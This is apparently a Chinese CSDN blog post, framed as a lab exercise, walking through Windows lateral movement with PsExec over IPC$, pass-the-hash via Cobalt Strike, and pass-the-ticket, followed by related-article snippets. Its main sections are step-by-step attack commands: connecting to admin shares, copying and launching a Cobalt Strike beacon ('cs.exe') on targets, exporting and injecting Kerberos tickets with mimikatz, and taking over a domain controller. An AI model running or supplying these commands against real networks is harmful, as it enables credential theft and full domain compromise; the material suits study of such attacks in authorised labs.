PsExec横向:IPC&PTH&PTT

于 2024-07-28 17:45:22 发布
阅读量898 收藏 5
点赞数 40
文章标签: 内网安全 横向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80116443/article/details/140751769
版权

一.IPC下的PsExec

二.PTH下的psexec(CS操作)

三.PTT下的psexec

PsExec工具:

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

PsExec常用参数:

psexec.exe \\ip -u administrator -p admin cmd 进⼊半交互式shell

PsExec -accepteula \\192.168.108.101 -s cmd.exe 建立交互的shell

psexec \\ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录

psexec \\ip -u administrator -p admin whoami all 执行命令

psexec \\ip -u administrator -p admin -d c:\beacon.exe 执行文件

psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

一.IPC下的PsExec

实验利用:

1.先通过信息收集,得到目标机器的账号密码,建立IPC连接

net use \\192.168.11.147\ipc$ " " /user:administrator

2.连接成功以后,查看一下它的IP:

psexec.exe -accepteula \\192.168.11.147 -s ipconfig

3.复制恶意程序

copy C:\Users\admin\Desktop\cs.exe \\192.168.11.147\C$

4.上线CS

psexec.exe -accepteula \\192.168.11.147 -h -d c:\cs.exe

二.PTH下的psexec,(CS操作)

1.通过信息收集,找到登录凭证

2.找到通过扫描的目标地址

3.进行psexec攻击上线

4.成功上线

三.PTT下的psexec

1.上传psexec

2.导出内存的票据:

mimikatz  sekurlsa::tickets /export

3.清除内存中的票据

shell klist purge

mimikatz kerberos::purge

4.将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;1aa366]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

5.查看票据:

shell klist

mimikatz kerberos::tgt

6.远程复制:

copy C:\Users\admin\Desktop\cs.exe \\dc.hack.com\C$

7.远程上线域控

shell psexec.exe -accepteula \\dc.hack.com -h -d c:\cs.exe

闰土炖猹
关注
  • 40
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1578
横向移动】PsExec工具远程命令执行横向移动 文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
内网安全——横向移动&IPC&Socks&Pysatexec
m0_61506558的博客
01-31 491
横向移动-IPC-套件版- Impacket-atexec,impacket -atexec该工具是一一个半交互的工具,适用于webshell下,Socks代理下;IPC是专用管道,可以实现对远程计算机的访问,需要使用目标系统用户的账号密码,使用139、445端口。可以看到我们拿到了DC的hash值,再进行横向移动,再利用本地的Impacket上线。域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。之前介绍的代理技术这里可以用到,解决上线通讯问题。
横向远程命令执行——PSEXEC
SheXinK’s Blog
12-28 917
横向远程命令执行——PSEXEC1、 测试环境2、 PSEXEC命令执行2.1 psexec.exe   PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远...
内网横移之PsExec
Canterlot的博客
09-04 1277
本文介绍了PsExec的运行原理,执行命令的工作过程,以及相关工具基本用法
【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用】
AA8j的博客
11-18 8103
文章目录1. PsTools工具包中的PsExec1.1 注意事项1.2 使用方法1.2.1 获得交互式shell1.2.2 执行单条命令并回显2. CS中的PsExec2.1 查看目标所在网段其它主机2.2 使用PsExec横向移动3. msf中的PsExec3.1 添加路由3.2 加载模块,设置目标IP、账号、密码及设置payload 1. PsTools工具包中的PsExec 地址:https://download.sysinternals.com/files/PSTools.zip 1.1 注意事项
内网横向PTH
qq_44029310的博客
10-16 2133
内网横向PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1366
内网环境下的横向移动总结
内网环境下的横向移动总结
hongduilanjun的博客
07-21 2676
前言在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...
内网渗透,横向移动总结(mimikatz域控)
墨痕诉清风的博客
08-23 2964
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 752
内网渗透—哈希传递攻击PTH的几种方式
学习笔记-IPC$(Internet Process Connection)
人饭子的博客
11-05 1603
IPC$(Internet Process Connection) IPC$ 的概念 IPC$(Internet Process Connection) 是共享 "命名管道" 的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限, 在远程管理计算机和查看计算机的共享资源时使用。 利用 IPC$,连接者可以与目标主机建立一个连接,利用这个连接连接者可以得到目标主...
PTH(PASS THE HASH)
qq_63527808的博客
01-21 933
2、NTLM 认证不使用明文口令,而是使用口令加密后的 hash 值,hash 值由系统 API 生成 3、hash 分为 LM hash 和 NT hash,如果密码长度大于15,那么无法生成 LM hash。6、微软也对 PTH 打过补丁,然而在测试中发现,在打了补丁后,常规的 PTH 已经无法成功,唯独默认的 Administrator(SID 500) 账号例外,利用这个账号仍可以进行 PTH 远程 ipc 连接。(2)可以获得 hash,但是条件不允许对 hash 爆破。
内网安全-横向移动】IPC$连接--->计划任务--->上线
02-07 8850
横向移动-IPC$连接】at&schtasks创建定时任务上线
IPC$管道通信
最新发布
carmi的博客
03-19 432
IPC$管道通信 IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接连接者可以得到目标主机上的目录结构、用户列表等信息。 实现IPS$管道通信的前提:被连接方需...
如何建立远程IPC$连接
热门推荐
无为
06-06 1万+
如何建立远程IPC$连接     要建立远程IPC$连接必须具备以下条件: 1、有超管的密码; 2、远程机开启了Sever服务项,一般都开了,除非是高手知道多一点; 3、了解以下Net Use之类的命令。 先用X-scan扫一下哪些机子有ipc漏洞,或者超管密码为空的。比如得到IP 192.168.0.1.。先Ping一下,确保他在线。然后在Windows
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1440
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
域环境PTH(pass-the-hash) HASH 传递
Longwaer
01-19 1556
学习了解域环境中PTH的原理及利用方式,更快的掌握域环境。
帮我写一个cmd脚本,读取txt文件中的每一行主机名,并使用psexec命令:批量推送一个powershell文件到每一台主机中并运行这个文件,返回运行结果
07-11
当然,我可以帮你写一个 CMD 脚本来实现这个功能。以下是一个示例脚本: ```batch @echo off setlocal enabledelayedexpansion ...请注意,你需要确保 `psexec` 命令在系统的 PATH 路径中,否则你需要提供 `
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值